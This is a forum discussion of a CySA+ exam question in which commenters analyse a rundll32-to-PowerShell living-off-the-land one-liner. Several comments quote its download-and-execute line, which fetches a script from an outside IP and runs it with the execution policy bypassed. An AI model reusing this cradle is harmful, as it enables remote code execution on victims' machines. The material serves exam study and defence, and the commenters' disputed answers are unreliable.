Exam CS0-003 topic 1 question 264 discussion

The one-liner provided in the image executes the following steps: Rundll32.exe is used to run a JavaScript command. The JavaScript command creates an instance of ActiveXObject to run a PowerShell command. The PowerShell command (IEX (New-Object Net.WebClient).DownloadString('77.247.109.185/AccessToken.ps1')) is used to download and execute a script (AccessToken.ps1) from a remote server. Best Description of the Attack Intent: The intent of the attacker, based on this one-liner, is most accurately described by the following statement: C. Attacker is executing PowerShell script “AccessToken.ps1”

The attacker is not using custom malware for the download, rundll32 is legitimate windows tool. This is a Living off the land attack. C best describes this scenario.

The best answer is: C. Attacker is executing PowerShell script “AccessToken.ps1”. Explanation: The given one-liner uses rundll32.exe to execute JavaScript through mshtml (Microsoft HTML Application). This script then creates an ActiveX object (WScript.Shell) to run a PowerShell command. The PowerShell command: Runs in hidden mode (-w h -nologo -noprofile) Bypasses execution policy (-ep bypass) Uses IEX (New-Object Net.WebClient).DownloadString('77.247.109.185/AccessToken.ps1') to download and execute the AccessToken.ps1 script from an external server Since the primary goal of the command is to download and execute AccessToken.ps1, option C is the most accurate choice.

The ps1 script is being fetched...This JavaScript payload is tailored for an attack "custom". Malware usually refers to any malicious software or script crafted for an attack. This is evidence of custom malware being used to download an additional script.

There is no evidence of malware being used to download the script, it could be run from the browser, therefore C is more accurate.

Answer should be B. The attacker isn't just executing a script that is stored locally, it's downloading it from a remote location.

I would go with C

The one-liner script is utilizing JavaScript to execute a PowerShell command that downloads and runs a script from an external source, indicating the use of custom malware to download an additional script. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 156.